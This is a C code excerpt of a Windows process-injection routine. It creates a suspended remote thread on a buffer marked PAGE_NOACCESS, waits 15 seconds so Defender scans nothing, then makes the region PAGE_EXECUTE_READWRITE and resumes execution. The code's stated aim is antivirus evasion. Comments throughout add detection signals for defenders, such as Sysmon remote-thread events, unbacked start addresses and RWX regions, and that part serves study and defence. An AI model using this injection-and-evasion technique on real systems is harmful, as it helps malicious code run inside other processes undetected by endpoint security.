Suspended Threads

// Excerpt of a larger routine. The steps visible here are:
//   1. set the remote buffer's protection to PAGE_NOACCESS,
//   2. create a suspended thread in the target process that starts at that buffer,
//   3. wait 15 seconds,
//   4. set the region to PAGE_EXECUTE_READWRITE,
//   5. resume the thread.
// hProcess, pRemoteBuffer, protect, hRemoteThread, SHELLCODE_MEMORY_SIZE and the
// my* functions are defined outside this excerpt. The my* names presumably map to
// the Win32 APIs of the same name (VirtualProtectEx, CreateRemoteThread,
// ResumeThread) -- confirm against their definitions.
//
// Defender view: every step is observable. Worth alerting on are a cross-process
// protection change to PAGE_NOACCESS followed by one to PAGE_EXECUTE_READWRITE on
// the same region, and a remote thread created suspended whose start address is
// not backed by a loaded module.
printf("[+] Changing memory protection, marking it as PAGE_NO_ACCESS\n");
// Mark the region PAGE_NOACCESS (0x01). The log text above spells it
// "PAGE_NO_ACCESS"; the actual constant is PAGE_NOACCESS.
// The return value is not checked here.
myVirtualProtectEx(hProcess, pRemoteBuffer, SHELLCODE_MEMORY_SIZE, PAGE_NOACCESS, &protect); // &protect: presumably the lpflOldProtect out-parameter -- confirm

// Create the remote thread in a suspended state.
// Leftover C# form of the same call, kept for reference:
//IntPtr hThread = CreateRemoteThread(hProcess, IntPtr.Zero, 0, addr, IntPtr.Zero, 0x00000004, out hThread);

// CREATE_SUSPENDED = 0x00000004
printf("[+] Creating suspended remote thread\n");
// The thread's start address is pRemoteBuffer itself. Remote thread creation is
// reported by Sysmon as Event ID 8 (CreateRemoteThread) with the start address,
// so a start address with no owning module is a usable detection signal.
// hRemoteThread is not checked for NULL before it is used below.
hRemoteThread = myCreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteBuffer, NULL, CREATE_SUSPENDED, NULL);

// Author's stated intent: wait 15 seconds while Defender scans the memory. The
// region stays PAGE_NOACCESS for this whole window.
// NOTE(review): a scan that runs only at thread creation would not see the
// region's final protection; inspecting again at the later protection change or
// at thread resume covers that gap.
printf("[+] Sleeping for 15 seconds...\n");

// Alternative sleep routine, disabled; its definition is not shown here.
//CronosSleep(15);
Sleep(15000);

// Restore an executable protection: PAGE_EXECUTE_READWRITE (0x40).
// A private region that is writable and executable at once is a common
// memory-scanner indicator in its own right.
printf("[+] Changing memory protection back, marking it as PAGE_EXECUTE_READWRITE\n");
// This call overwrites protect, so the value stored by the first call is lost.
myVirtualProtectEx(hProcess, pRemoteBuffer, SHELLCODE_MEMORY_SIZE, PAGE_EXECUTE_READWRITE, &protect);

printf("[+] Resuming remote thread\n");
// Execution at pRemoteBuffer starts only here; the return value is not checked.
myResumeThread(hRemoteThread);
